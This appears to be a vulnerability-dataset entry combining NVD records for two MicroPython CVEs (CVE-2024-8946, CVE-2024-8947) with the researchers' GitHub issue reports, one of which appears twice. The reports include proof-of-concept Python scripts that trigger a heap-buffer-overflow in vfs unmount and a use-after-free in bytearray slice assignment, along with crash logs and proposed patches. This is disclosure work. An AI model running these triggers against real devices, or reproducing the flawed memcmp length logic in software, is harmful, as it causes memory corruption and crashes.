{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/micropython/micropython/commit/29943546343c92334e8518695a11fc0e2ceea68b" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/micropython/micropython/issues/13006" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/micropython/micropython/issues/13006#issuecomment-1820309455" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.277764" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.277764" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.409312" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:micropython:micropython:1.23.0:*:*:*:*:*:*:*", "matchCriteriaId": "EBC6A30E-745D-4C20-B482-1358929743FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/micropython/micropython/issues/13006
[ "Exploit", "Issue Tracking" ]
github.com
[ "micropython", "micropython" ]
# Summary - **OS**: Ubuntu 22.04 - **version**: micropython@a00c9d56db775ee5fc14c2db60eb07bab8e872dd - **port**: unix - **contribution**: Junwha Hong and Wonil Jang @S2-Lab UNIST - **description**: - at `mp_vfs_umount` extmod/vfs.c:276, the comparison between unmount string and previous mounts are performed based on the length of the unmount string - thus, - there is always global-buffer-overflow for non “/” unmount with the mount “/” - there is heap-buffer-overflow if longer mount strings unmount earlier than shorter mount strings # PoC ```cpp # Test for VfsLittle using a RAM device, with mount/umount try: import os os.VfsLfs1 except (ImportError, AttributeError): print("SKIP") raise SystemExit class RAMBlockDevice: ERASE_BLOCK_SIZE = 1024 def __init__(self, blocks): self.data = bytearray(blocks * self.ERASE_BLOCK_SIZE) def readblocks(self, block, buf, off=0): addr = block * self.ERASE_BLOCK_SIZE + off for i in range(len(buf)): buf[i] = self.data[addr + i] def writeblocks(self, block, buf, off=0): addr = block * self.ERASE_BLOCK_SIZE + off for i in range(len(buf)): self.data[addr + i] = buf[i] def ioctl(self, op, arg): if op == 4: # block count return len(self.data) // self.ERASE_BLOCK_SIZE if op == 5: # block size return self.ERASE_BLOCK_SIZE if op == 6: # erase block return 0 def test(vfs_class): bdev = RAMBlockDevice(10) vfs_class.mkfs(bdev) # construction vfs = vfs_class(bdev) # mount os.mount(vfs, "/lfs") # umount os.umount("/lffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffs") import sys sys.path.clear() sys.path.append("/lfs") sys.path.append("") # run tests test(os.VfsLfs1) ``` ```cpp micropython bof_vfs_unmount.py ``` # Problem Statement at `mp_vfs_umount` extmod/vfs.c:276, the comparison is performed based on the string of the request of unmount, but the string of one of the previous mount string can be shorter than the string of unmount. ```c mp_obj_t mp_vfs_umount(mp_obj_t mnt_in) { // remove vfs from the mount table mp_vfs_mount_t *vfs = NULL; size_t mnt_len; const char *mnt_str = NULL; if (mp_obj_is_str(mnt_in)) { **mnt_str = mp_obj_str_get_data(mnt_in, &mnt_len);** } for (mp_vfs_mount_t **vfsp = &MP_STATE_VM(vfs_mount_table); *vfsp != NULL; vfsp = &(*vfsp)->next) { **if ((mnt_str != NULL && !memcmp(mnt_str, (*vfsp)->str, mnt_len + 1)) || (*vfsp)->obj == mnt_in) {** vfs = *vfsp; *vfsp = (*vfsp)->next; break; } } if (vfs == NULL) { mp_raise_OSError(MP_EINVAL); } // if we unmounted the current device then set current to root if (MP_STATE_VM(vfs_cur) == vfs) { MP_STATE_VM(vfs_cur) = MP_VFS_ROOT; } // call the underlying object to do any unmounting operation mp_vfs_proxy_call(vfs, MP_QSTR_umount, 0, NULL); return mp_const_none; } ``` In our PoC, the comparison was performed between “/lfs” and “lffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffs”, using the length of the later one. and because “/lfs” is a part of the qstr which is allocated from `qstr_from_strn`, the actual buffer overflow occurs. Also, it lead to global buffer overflow at the next for loop, because it compare the string with “/”. Thus, to sum up, - there is always global-buffer-overflow for non “/” unmount with the mount “/” - there is heap-buffer-overflow if longer mount strings unmount earlier than shorter mount strings # Crash Log ```c #1 0x5555557c96c1 in mp_vfs_umount /home/qbit/testing-2023/micropython/ports/unix/../../extmod/vfs.c:276:34 #2 0x555555782c1c in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:1042:21 #3 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42 #4 0x555555781b2c in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:957:21 #5 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42 #6 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13 #7 0x555555902ad5 in do_file /home/qbit/testing-2023/micropython/ports/unix/main.c:310:12 #8 0x555555902ad5 in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:722:19 #9 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #10 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #11 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34) ``` # Patch we need to use “min” length between them, or compare the length first. ```c mp_obj_t mp_vfs_umount(mp_obj_t mnt_in) { // remove vfs from the mount table mp_vfs_mount_t *vfs = NULL; size_t mnt_len; const char *mnt_str = NULL; if (mp_obj_is_str(mnt_in)) { mnt_str = mp_obj_str_get_data(mnt_in, &mnt_len); } for (mp_vfs_mount_t **vfsp = &MP_STATE_VM(vfs_mount_table); *vfsp != NULL; vfsp = &(*vfsp)->next) { if ((mnt_str != NULL && !memcmp(mnt_str, (*vfsp)->str, min((*vfsp)->len, mnt_len + 1))) || (*vfsp)->obj == mnt_in) { vfs = *vfsp; *vfsp = (*vfsp)->next; break; } } ... ``` ***Thank you for taking the time to review our bug report! :)***
heap-buffer-overflow: incorrect length choice on memcpy at vfs unmount
https://api.github.com/repos/micropython/micropython/issues/13006/comments
2
2023-11-17T09:50:10Z
2024-07-23T02:32:29Z
https://github.com/micropython/micropython/issues/13006
1,998,710,063
13,006
6,275
CVE-2024-8946
2024-09-17T19:15:29.220
A vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/micropython/micropython/commit/29943546343c92334e8518695a11fc0e2ceea68b" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/micropython/micropython/issues/13006" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/micropython/micropython/issues/13006#issuecomment-1820309455" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.277764" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.277764" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.409312" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:micropython:micropython:1.23.0:*:*:*:*:*:*:*", "matchCriteriaId": "EBC6A30E-745D-4C20-B482-1358929743FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/micropython/micropython/issues/13006#issuecomment-1820309455
[ "Exploit", "Third Party Advisory" ]
github.com
[ "micropython", "micropython" ]
# Summary - **OS**: Ubuntu 22.04 - **version**: micropython@a00c9d56db775ee5fc14c2db60eb07bab8e872dd - **port**: unix - **contribution**: Junwha Hong and Wonil Jang @S2-Lab UNIST - **description**: - at `mp_vfs_umount` extmod/vfs.c:276, the comparison between unmount string and previous mounts are performed based on the length of the unmount string - thus, - there is always global-buffer-overflow for non “/” unmount with the mount “/” - there is heap-buffer-overflow if longer mount strings unmount earlier than shorter mount strings # PoC ```cpp # Test for VfsLittle using a RAM device, with mount/umount try: import os os.VfsLfs1 except (ImportError, AttributeError): print("SKIP") raise SystemExit class RAMBlockDevice: ERASE_BLOCK_SIZE = 1024 def __init__(self, blocks): self.data = bytearray(blocks * self.ERASE_BLOCK_SIZE) def readblocks(self, block, buf, off=0): addr = block * self.ERASE_BLOCK_SIZE + off for i in range(len(buf)): buf[i] = self.data[addr + i] def writeblocks(self, block, buf, off=0): addr = block * self.ERASE_BLOCK_SIZE + off for i in range(len(buf)): self.data[addr + i] = buf[i] def ioctl(self, op, arg): if op == 4: # block count return len(self.data) // self.ERASE_BLOCK_SIZE if op == 5: # block size return self.ERASE_BLOCK_SIZE if op == 6: # erase block return 0 def test(vfs_class): bdev = RAMBlockDevice(10) vfs_class.mkfs(bdev) # construction vfs = vfs_class(bdev) # mount os.mount(vfs, "/lfs") # umount os.umount("/lffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffs") import sys sys.path.clear() sys.path.append("/lfs") sys.path.append("") # run tests test(os.VfsLfs1) ``` ```cpp micropython bof_vfs_unmount.py ``` # Problem Statement at `mp_vfs_umount` extmod/vfs.c:276, the comparison is performed based on the string of the request of unmount, but the string of one of the previous mount string can be shorter than the string of unmount. ```c mp_obj_t mp_vfs_umount(mp_obj_t mnt_in) { // remove vfs from the mount table mp_vfs_mount_t *vfs = NULL; size_t mnt_len; const char *mnt_str = NULL; if (mp_obj_is_str(mnt_in)) { **mnt_str = mp_obj_str_get_data(mnt_in, &mnt_len);** } for (mp_vfs_mount_t **vfsp = &MP_STATE_VM(vfs_mount_table); *vfsp != NULL; vfsp = &(*vfsp)->next) { **if ((mnt_str != NULL && !memcmp(mnt_str, (*vfsp)->str, mnt_len + 1)) || (*vfsp)->obj == mnt_in) {** vfs = *vfsp; *vfsp = (*vfsp)->next; break; } } if (vfs == NULL) { mp_raise_OSError(MP_EINVAL); } // if we unmounted the current device then set current to root if (MP_STATE_VM(vfs_cur) == vfs) { MP_STATE_VM(vfs_cur) = MP_VFS_ROOT; } // call the underlying object to do any unmounting operation mp_vfs_proxy_call(vfs, MP_QSTR_umount, 0, NULL); return mp_const_none; } ``` In our PoC, the comparison was performed between “/lfs” and “lffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffs”, using the length of the later one. and because “/lfs” is a part of the qstr which is allocated from `qstr_from_strn`, the actual buffer overflow occurs. Also, it lead to global buffer overflow at the next for loop, because it compare the string with “/”. Thus, to sum up, - there is always global-buffer-overflow for non “/” unmount with the mount “/” - there is heap-buffer-overflow if longer mount strings unmount earlier than shorter mount strings # Crash Log ```c #1 0x5555557c96c1 in mp_vfs_umount /home/qbit/testing-2023/micropython/ports/unix/../../extmod/vfs.c:276:34 #2 0x555555782c1c in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:1042:21 #3 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42 #4 0x555555781b2c in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:957:21 #5 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42 #6 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13 #7 0x555555902ad5 in do_file /home/qbit/testing-2023/micropython/ports/unix/main.c:310:12 #8 0x555555902ad5 in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:722:19 #9 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #10 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #11 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34) ``` # Patch we need to use “min” length between them, or compare the length first. ```c mp_obj_t mp_vfs_umount(mp_obj_t mnt_in) { // remove vfs from the mount table mp_vfs_mount_t *vfs = NULL; size_t mnt_len; const char *mnt_str = NULL; if (mp_obj_is_str(mnt_in)) { mnt_str = mp_obj_str_get_data(mnt_in, &mnt_len); } for (mp_vfs_mount_t **vfsp = &MP_STATE_VM(vfs_mount_table); *vfsp != NULL; vfsp = &(*vfsp)->next) { if ((mnt_str != NULL && !memcmp(mnt_str, (*vfsp)->str, min((*vfsp)->len, mnt_len + 1))) || (*vfsp)->obj == mnt_in) { vfs = *vfsp; *vfsp = (*vfsp)->next; break; } } ... ``` ***Thank you for taking the time to review our bug report! :)***
heap-buffer-overflow: incorrect length choice on memcpy at vfs unmount
https://api.github.com/repos/micropython/micropython/issues/13006/comments
2
2023-11-17T09:50:10Z
2024-07-23T02:32:29Z
https://github.com/micropython/micropython/issues/13006
1,998,710,063
13,006
6,276
CVE-2024-8947
2024-09-17T19:15:29.483
A vulnerability was found in MicroPython 1.22.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file py/objarray.c. The manipulation leads to use after free. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 1.23.0 is able to address this issue. The identifier of the patch is 4bed614e707c0644c06e117f848fa12605c711cd. It is recommended to upgrade the affected component. In micropython objarray component, when a bytes object is resized and copied into itself, it may reference memory that has already been freed.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "HIGH", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/micropython/micropython/commit/4bed614e707c0644c06e117f848fa12605c711cd" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/micropython/micropython/issues/13283" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/micropython/micropython/issues/13283#issuecomment-1918479709" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes" ], "url": "https://github.com/micropython/micropython/releases/tag/v1.23.0" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.277765" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.277765" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.409316" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:micropython:micropython:1.22.2:*:*:*:*:*:*:*", "matchCriteriaId": "F367A317-2420-445C-B455-21BAFD6E2064", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/micropython/micropython/issues/13283
[ "Exploit", "Third Party Advisory" ]
github.com
[ "micropython", "micropython" ]
Hi all, I'm Wonil Jang, from the research group S2Lab in UNIST. We found a use after free bug from micropython by our custom tool. The detailed information is as follows. ## Environment - OS: Ubuntu 22.04 - Version: micropython at commit a5bdd39127 - Build: unix ports - Bug Type: use-after-free - Bug Location: [micropython/py/objarray.c:509](https://github.com/micropython/micropython/blob/master/py/objarray.c#L509) - Credits: Junwha Hong and Wonil Jang, from S2Lab in UNIST ## Proof-of-Concept (PoC) ```python b = bytearray(b'1234567') for i in range(3): b[-1:] = b ``` ## Problem Statement By PoC, ```cpp STATIC mp_obj_t array_subscr(mp_obj_t self_in, mp_obj_t index_in, mp_obj_t **value**) { ... size_t src_len; void *src_items; size_t item_sz = mp_binary_get_size('@', o->typecode & TYPECODE_MASK, NULL); if (mp_obj_is_obj(value) && MP_OBJ_TYPE_GET_SLOT_OR_NULL(((mp_obj_base_t *)MP_OBJ_TO_PTR(value))->type, subscr) == array_subscr) { // value is array, bytearray or memoryview **mp_obj_array_t *src_slice = MP_OBJ_TO_PTR(value);** if (item_sz != mp_binary_get_size('@', src_slice->typecode & TYPECODE_MASK, NULL)) { compat_error: mp_raise_ValueError(MP_ERROR_TEXT("lhs and rhs should be compatible")); } **src_len = src_slice->len;** **src_items = src_slice->items;** #if MICROPY_PY_BUILTINS_MEMORYVIEW if (mp_obj_is_type(value, &mp_type_memoryview)) { src_items = (uint8_t *)src_items + (src_slice->memview_offset * item_sz); } #endif } ... if ((size_t)len_adj > o->free) { // TODO: alloc policy; at the moment we go conservative **o->items = m_renew(byte, o->items, (o->len + o->free) * item_sz, (o->len + len_adj) * item_sz);** o->free = len_adj; dest_items = o->items; } mp_seq_replace_slice_grow_inplace(dest_items, o->len, slice.start, slice.stop, **src_items**, src_len, len_adj, item_sz); ``` If you run the PoC, ```self_in``` and ```value``` can be same in ```array_subscr``` function. This is because when ```subscr()``` function is called, It just uses reference without copying. and then, if the address is rebased after calling realloc, only ```self_in``` changed and ```value```(src) becomes a dangling pointer. So when copying it, the use after free bug occurs. ## Patch It should keep source before calling fixed realloc(). ## Log ```cpp #1 0x5555557340a4 in array_subscr /home/qbit/testing-2023/micropython/ports/unix/../../py/objarray.c:509:21 #2 0x555555731de6 in mp_obj_subscr /home/qbit/testing-2023/micropython/ports/unix/../../py/obj.c:536:24 #3 0x555555781d05 in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:487:21 #4 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42 #5 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13 #6 0x555555902ad5 in do_file /home/qbit/testing-2023/micropython/ports/unix/main.c:310:12 #7 0x555555902ad5 in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:722:19 #8 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #9 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #10 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34) ``` Thank you for reading my report.
use after free found at micropython/py/objarray.c:509 [micropython@a5bdd39127]
https://api.github.com/repos/micropython/micropython/issues/13283/comments
4
2023-12-27T16:49:55Z
2024-04-22T02:12:14Z
https://github.com/micropython/micropython/issues/13283
2,057,585,750
13,283
6,277
CVE-2024-8947
2024-09-17T19:15:29.483
A vulnerability was found in MicroPython 1.22.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file py/objarray.c. The manipulation leads to use after free. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 1.23.0 is able to address this issue. The identifier of the patch is 4bed614e707c0644c06e117f848fa12605c711cd. It is recommended to upgrade the affected component. In micropython objarray component, when a bytes object is resized and copied into itself, it may reference memory that has already been freed.
